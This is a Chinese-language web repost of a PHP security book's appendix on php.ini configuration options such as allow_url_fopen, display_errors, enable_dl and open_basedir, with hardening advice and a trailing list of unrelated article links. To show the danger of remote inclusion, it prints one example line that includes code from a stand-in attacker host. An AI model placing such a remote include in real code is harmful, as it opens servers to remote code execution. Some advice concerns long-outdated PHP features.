PHP安全-配置選項(xiàng)
盡管本書的焦點(diǎn)是在于應(yīng)用的安全性,但有一些配置選項(xiàng)是任何關(guān)心安全的開發(fā)者必需熟悉的。PHP的配置會影響你所寫代碼的行為以及你使用的技巧,必要時你需要稍稍負(fù)責(zé)一下應(yīng)用程序以外的東西。
PHP的配置主要由一個名為php.ini的文件所指定。該文件包含很多配置選項(xiàng),每一項(xiàng)都會對PHP產(chǎn)生非常特定的影響。如果該文件不存在,或者該文件中的某選項(xiàng)不存在,則會使用默認(rèn)值。
如果你不知道php.ini文件所在的位置,你可以使用phpinfo( )來確定PHP中對該文件路徑的定義:
<?php
phpinfo();
?>
圖A-1 所示的第六行(配置文件(php.ini)路徑)顯示了php.ini的完整路徑。如果只顯示了路徑(沒有文件名),這就意味著PHP無法在所示路徑找到php.ini文件。
該文件包含的自身說明非常好,因此你可以閱讀該文件并選擇適合你的配置選項(xiàng)。而手冊更是詳細(xì),所以在你需要某一選項(xiàng)的更多信息時,我推薦訪問http://php.net/manual/ini.php
圖A-1. phpinfo( ) 函數(shù)可用于php.ini文件的定位
A.1. allow_url_fopen
正如第六章所示,allow_url_fopen選項(xiàng)允許你如同本地文件一樣引用遠(yuǎn)程資源:
<?php
$contents = file_get_contents(’http://example.org/xss.html’);
?>
在第五章中揭示了當(dāng)它與include或require相結(jié)合時的危險(xiǎn)性:
<?php
include ’http://evil.example.org/evil.inc’;
?>
我推薦關(guān)閉allow_url_fopen選項(xiàng),除非你的應(yīng)用需要它。
A.2. disable_functions
disable_functions選項(xiàng)是非常有用的,它可以確保一些有潛在威脅的函數(shù)不能被使用。盡管可以建立規(guī)范去禁止使用這些函數(shù),但在PHP配置中進(jìn)行限制要比依賴于開發(fā)者對規(guī)范的遵循要可靠得多。
我建立對附錄B列出的函數(shù)進(jìn)行檢查,看一下是否要對一些函數(shù)進(jìn)行限制。
A.3. display_errors
PHP的錯誤報(bào)告可以幫助你發(fā)現(xiàn)你所寫代碼中的錯誤。當(dāng)你開發(fā)應(yīng)用時,把錯誤提示顯示出來是取得即時反饋的有效方法,同時也可以加快開發(fā)速度。
在一個產(chǎn)品級的應(yīng)用中,這一行為會成為一項(xiàng)安全風(fēng)險(xiǎn)。如果它顯示錯誤信息,所有人就可以得知你的應(yīng)用中的重要信息。
在產(chǎn)品中你需要關(guān)閉display_errors選項(xiàng)。
A.4. enable_dl
enable_dl選項(xiàng)用于控制dl()函數(shù)是否生效,該函數(shù)允許在運(yùn)行時加載PHP擴(kuò)展。
使用dl()函數(shù)可能導(dǎo)致攻擊者繞過open_basedir限制,因此除非有必要,你必須在你的應(yīng)用中禁止它。
A.5. error_reporting
很多安全漏洞是由于使用了未初始化的變量或其它隨意的編程方法引起的。通過把PHP的error_reporting選項(xiàng)置為E_ALL 或 E_ALL | E_STRICT,PHP就會對上述行為進(jìn)行提示。這些設(shè)置都為報(bào)告Notice級別的錯誤。
我建議把error_reporting至少設(shè)定為E_ALL。(譯注:在開發(fā)中)
A.6. file_uploads
file_uploads選項(xiàng)決定了是否允許上傳文件。因此,如果你的應(yīng)用不需要用戶上傳文件,那么關(guān)閉該選項(xiàng)就是最好的選擇。
只是簡單地在PHP代碼中不對上傳文件進(jìn)行處理是不夠的,因?yàn)樵趫?zhí)行你的代碼前,PHP就做了一些工作(如根據(jù)相關(guān)部據(jù)生成$_FILES數(shù)組)。
A.7. log_errors
當(dāng)log_errors設(shè)為有效時,PHP會向error_log配置選項(xiàng)指定的文件中寫入所有出錯信息。
當(dāng)display_errors設(shè)為無效時,將log_errors設(shè)為有效是很重要的;否則你將無法看到睛出錯信息。
我建議將log_errors設(shè)為有效并在error_log設(shè)定日志文件所在位置。
A.8. magic_quotes_gpc
magic_quotes_gpc是一個常用的選項(xiàng),它目的是防止SQL注入。但出于很多原因,包括它轉(zhuǎn)義輸入的方式,證明了它是不完善的。
它對$_GET, $_POST, 以及 $_COOKIE中的數(shù)據(jù)使用同樣的規(guī)則即addslashes( )函數(shù)進(jìn)行處理。從而,它并沒有根據(jù)你的數(shù)據(jù)庫選用對應(yīng)的轉(zhuǎn)義函數(shù)進(jìn)行處理。
基于兩個主要的原因,你需要把get_magic_quotes_gpc設(shè)為無效:
首先,它會加大你的輸入過濾邏輯的復(fù)雜性,這是由于它在執(zhí)行你的代碼前首先對數(shù)據(jù)進(jìn)行了編輯。例如,你需要對輸入的姓名進(jìn)行過濾,其邏輯是只允許字母、空格、連詞符以及單引號,當(dāng)magic_quotes_gpc生效時,你必須適應(yīng)形如O’Reilly的姓名或者使用stripslashes( )嘗試將它恢復(fù)原形。這一不必要的復(fù)雜性(或者說不嚴(yán)謹(jǐn)?shù)倪^濾規(guī)則)加大了發(fā)生錯誤的可能性,同時,你的輸入過濾機(jī)制中的缺陷必然會導(dǎo)致安全漏洞。
其次,它并沒有根據(jù)你的數(shù)據(jù)庫選用對應(yīng)的轉(zhuǎn)義函數(shù)進(jìn)行處理。這樣,由于它可以抵擋一些低層次或偶發(fā)的攻擊,掩蓋了它是一個糟糕的過濾或轉(zhuǎn)義機(jī)制這個事實(shí),從而留下了一個安全漏洞,使你的應(yīng)用無法抵擋如針對字符集的攻擊等更復(fù)雜的攻擊手段。
A.9. memory_limit
為防止寫得糟糕的腳本占用所有的可用內(nèi)存,可以使用memory_limit選項(xiàng)對最大內(nèi)存使用量進(jìn)行限制(以字節(jié)方式或縮寫方式如8M指定)。
盡管最佳的取值是與運(yùn)行的應(yīng)用是相關(guān)的,我還是建議在大多情況下使用默認(rèn)值8M。
memory_limit選項(xiàng)只有在PHP指定了enable-memory-limit方式編譯時才會生效。
A.10. open_basedir
open_basedir選項(xiàng)會限制PHP只能在它指定的目錄中打開文件。盡管它不能取代正確的輸入過濾,但該選項(xiàng)能減少利用文件系統(tǒng)相關(guān)函數(shù)如include及require進(jìn)行的攻擊。
該選項(xiàng)的值會被當(dāng)做前綴使用,因此當(dāng)你想表示指定目錄時請小心不要漏了最后的斜杠:
open_basedir = /path/to/
小提示
請確認(rèn)enable_dl選項(xiàng)是關(guān)閉的,否則open_basedir的限制可能會被繞過。
A.11. register_globals
見第二章
A.12. safe_mode
見第八章
相關(guān)文章:
1. Python使用oslo.vmware管理ESXI虛擬機(jī)的示例參考2. Jsp servlet驗(yàn)證碼工具類分享3. .NET6打包部署到Windows Service的全過程4. python GUI庫圖形界面開發(fā)之PyQt5滑塊條控件QSlider詳細(xì)使用方法與實(shí)例5. IntelliJ IDEA 好用插件之a(chǎn)nalyze inspect code詳解6. JetBrains IntelliJ IDEA 配置優(yōu)化技巧7. idea2020.1無法自動加載maven依賴的jar包問題及解決方法8. PHP程序員簡單的開展服務(wù)治理架構(gòu)操作詳解(一)9. vue項(xiàng)目中使用bpmn為節(jié)點(diǎn)添加顏色的方法10. 解決idea update project 更新選項(xiàng)消失的問題
